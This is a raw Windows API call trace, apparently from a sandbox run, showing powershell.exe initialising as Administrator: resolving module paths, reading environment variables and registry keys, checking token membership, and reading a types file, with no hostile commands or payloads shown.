	[0682.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0682.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0690.224] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0690.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0690.224] CoTaskMemFree (pv=0x2b2120) 
	[0692.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0692.125] SetErrorMode (uMode=0x1) returned 0x1
	[0692.125] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16dd20 | out: lpFileInformation=0x16dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0692.125] SetErrorMode (uMode=0x1) returned 0x1
	[0710.504] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0710.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0710.504] CoTaskMemFree (pv=0x2b2120) 
	[0710.505] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0710.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0710.505] CoTaskMemFree (pv=0x2b2120) 
	[0710.505] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0710.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0710.506] CoTaskMemFree (pv=0x2b2120) 
	[0710.508] CoCreateGuid (in: pguid=0x16e0e8 | out: pguid=0x16e0e8*(Data1=0x36680884, Data2=0x9f31, Data3=0x48bf, Data4=([0]=0x94, [1]=0xb, [2]=0xa5, [3]=0xd2, [4]=0x58, [5]=0xd9, [6]=0xf9, [7]=0x72))) returned 0x0
	[0710.511] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0710.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0710.512] CoTaskMemFree (pv=0x2b2120) 
	[0710.514] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0710.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0710.515] CoTaskMemFree (pv=0x2b2120) 
	[0710.517] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0710.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0710.517] CoTaskMemFree (pv=0x2b2120) 
	[0710.551] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0713.456] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16dd90 | out: lpConsoleScreenBufferInfo=0x16dd90) returned 1
	[0713.478] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0713.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16dd90 | out: lpConsoleScreenBufferInfo=0x16dd90) returned 1
	[0713.479] GetVersionExW (in: lpVersionInformation=0x16dd20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dd20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0713.482] GetCurrentProcess () returned 0xffffffffffffffff
	[0713.483] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16ddb8 | out: TokenHandle=0x16ddb8*=0x2dc) returned 1
	[0713.487] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dcd8 | out: TokenInformation=0x0, ReturnLength=0x16dcd8) returned 0
	[0713.491] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2271b0
	[0713.491] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x2271b0, TokenInformationLength=0x4, ReturnLength=0x16dcd8 | out: TokenInformation=0x2271b0, ReturnLength=0x16dcd8) returned 1
	[0713.493] DuplicateTokenEx (in: hExistingToken=0x2dc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16de38 | out: phNewToken=0x16de38*=0x2d8) returned 1
	[0713.493] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dcd8 | out: TokenInformation=0x0, ReturnLength=0x16dcd8) returned 0
	[0713.493] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x227290
	[0713.493] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x227290, TokenInformationLength=0x4, ReturnLength=0x16dcd8 | out: TokenInformation=0x227290, ReturnLength=0x16dcd8) returned 1
	[0713.494] CheckTokenMembership (in: TokenHandle=0x2d8, SidToCheck=0x2c08028*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16de48 | out: IsMember=0x16de48) returned 1
	[0713.494] CloseHandle (hObject=0x2d8) returned 1
	[0713.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0713.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0713.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0713.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0718.222] CoTaskMemAlloc (cb=0x804) returned 0x1b3ca080
	[0718.222] GetConsoleTitleW (in: lpConsoleTitle=0x1b3ca080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0718.222] CoTaskMemFree (pv=0x1b3ca080) 
	[0718.236] CoTaskMemAlloc (cb=0x804) returned 0x1b3ca930
	[0718.236] GetConsoleTitleW (in: lpConsoleTitle=0x1b3ca930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0718.236] CoTaskMemFree (pv=0x1b3ca930) 
	[0718.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0718.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0718.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0718.238] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0718.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0718.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0718.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0718.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0722.882] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0722.884] CoCreateGuid (in: pguid=0x16df30 | out: pguid=0x16df30*(Data1=0x865ae1e8, Data2=0x9124, Data3=0x4847, Data4=([0]=0xbc, [1]=0x5e, [2]=0xb8, [3]=0x99, [4]=0xa0, [5]=0xef, [6]=0x0, [7]=0x8))) returned 0x0
	[0722.885] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0722.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0722.885] CoTaskMemFree (pv=0x2b2120) 
	[0724.468] WinSqmIsOptedIn () returned 0x0
	[0724.469] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.469] CoTaskMemFree (pv=0x2b2120) 
	[0724.470] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.470] CoTaskMemFree (pv=0x2b2120) 
	[0724.470] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.471] CoTaskMemFree (pv=0x2b2120) 
	[0724.471] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.471] CoTaskMemFree (pv=0x2b2120) 
	[0724.472] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.472] CoTaskMemFree (pv=0x2b2120) 
	[0724.473] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.473] CoTaskMemFree (pv=0x2b2120) 
	[0724.474] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.474] CoTaskMemFree (pv=0x2b2120) 
	[0724.474] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.474] CoTaskMemFree (pv=0x2b2120) 
	[0724.476] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.476] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.476] CoTaskMemFree (pv=0x2b2120) 
	[0724.480] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.480] CoTaskMemFree (pv=0x2b2120) 
	[0724.481] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.481] CoTaskMemFree (pv=0x2b2120) 
	[0724.481] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0724.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.481] CoTaskMemFree (pv=0x2b2120) 
	[0733.183] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0733.184] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0733.184] CoTaskMemFree (pv=0x2b2120) 
	[0733.185] CoTaskMemAlloc (cb=0xcc) returned 0x1b3c8970
	[0733.185] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b3c8970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0733.185] CoTaskMemFree (pv=0x1b3c8970) 
	[0733.185] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16daa8 | out: phkResult=0x16daa8*=0x308) returned 0x0
	[0733.185] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16da2c, lpData=0x0, lpcbData=0x16da28*=0x0 | out: lpType=0x16da2c*=0x2, lpData=0x0, lpcbData=0x16da28*=0x6c) returned 0x0
	[0733.186] CoTaskMemAlloc (cb=0x70) returned 0x2607c0
	[0733.186] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d9fc, lpData=0x2607c0, lpcbData=0x16d9f8*=0x6c | out: lpType=0x16d9fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16d9f8*=0x6c) returned 0x0
	[0733.186] CoTaskMemFree (pv=0x2607c0) 
	[0733.186] CoTaskMemAlloc (cb=0xcc) returned 0x1b3c8970
	[0733.186] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b3c8970, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0733.186] CoTaskMemFree (pv=0x1b3c8970) 
	[0733.186] CoTaskMemAlloc (cb=0xcc) returned 0x1b3c8970
	[0733.186] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b3c8970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0733.186] CoTaskMemFree (pv=0x1b3c8970) 
	[0733.190] RegCloseKey (hKey=0x308) returned 0x0
	[0733.190] CoTaskMemAlloc (cb=0xcc) returned 0x1b3c8970
	[0733.190] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b3c8970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0733.190] CoTaskMemFree (pv=0x1b3c8970) 
	[0733.190] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16daa8 | out: phkResult=0x16daa8*=0x308) returned 0x0
	[0733.190] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16da2c, lpData=0x0, lpcbData=0x16da28*=0x0 | out: lpType=0x16da2c*=0x0, lpData=0x0, lpcbData=0x16da28*=0x0) returned 0x2
	[0733.190] RegCloseKey (hKey=0x308) returned 0x0
	[0733.202] CoTaskMemAlloc (cb=0x20c) returned 0x2bca50
	[0733.202] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2bca50 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0733.204] CoTaskMemFree (pv=0x2bca50) 
	[0733.204] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0733.205] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0733.214] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0733.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.214] CoTaskMemFree (pv=0x2b2120) 
	[0733.216] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0733.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.216] CoTaskMemFree (pv=0x2b2120) 
	[0734.472] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0734.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.472] CoTaskMemFree (pv=0x2b2120) 
	[0734.472] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0734.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.473] CoTaskMemFree (pv=0x2b2120) 
	[0734.478] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d898 | out: phkResult=0x16d898*=0x310) returned 0x0
	[0734.479] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x16d8ac, lpData=0x0, lpcbData=0x16d8a8*=0x0 | out: lpType=0x16d8ac*=0x1, lpData=0x0, lpcbData=0x16d8a8*=0x74) returned 0x0
	[0734.479] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x16d81c, lpData=0x0, lpcbData=0x16d818*=0x0 | out: lpType=0x16d81c*=0x1, lpData=0x0, lpcbData=0x16d818*=0x74) returned 0x0
	[0734.479] CoTaskMemAlloc (cb=0x78) returned 0x2607c0
	[0734.479] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x16d7ec, lpData=0x2607c0, lpcbData=0x16d7e8*=0x74 | out: lpType=0x16d7ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d7e8*=0x74) returned 0x0
	[0734.479] CoTaskMemFree (pv=0x2607c0) 
	[0734.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0734.480] SetErrorMode (uMode=0x1) returned 0x1
	[0734.480] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d770 | out: lpFileInformation=0x16d770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0734.480] SetErrorMode (uMode=0x1) returned 0x1
	[0734.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0734.481] SetErrorMode (uMode=0x1) returned 0x1
	[0734.481] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d770 | out: lpFileInformation=0x16d770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0734.481] SetErrorMode (uMode=0x1) returned 0x1
	[0734.482] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0734.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.483] CoTaskMemFree (pv=0x2b2120) 
	[0734.487] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0734.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.487] CoTaskMemFree (pv=0x2b2120) 
	[0734.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0734.493] SetErrorMode (uMode=0x1) returned 0x1
	[0734.493] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0734.493] GetFileType (hFile=0x314) returned 0x1
	[0734.493] SetErrorMode (uMode=0x1) returned 0x1
	[0734.493] GetFileType (hFile=0x314) returned 0x1
	[0734.494] ReadFile (in: hFile=0x314, lpBuffer=0x2ca2e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ca2e28*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0734.496] ReadFile (in: hFile=0x314, lpBuffer=0x2ca2e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ca2e28*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
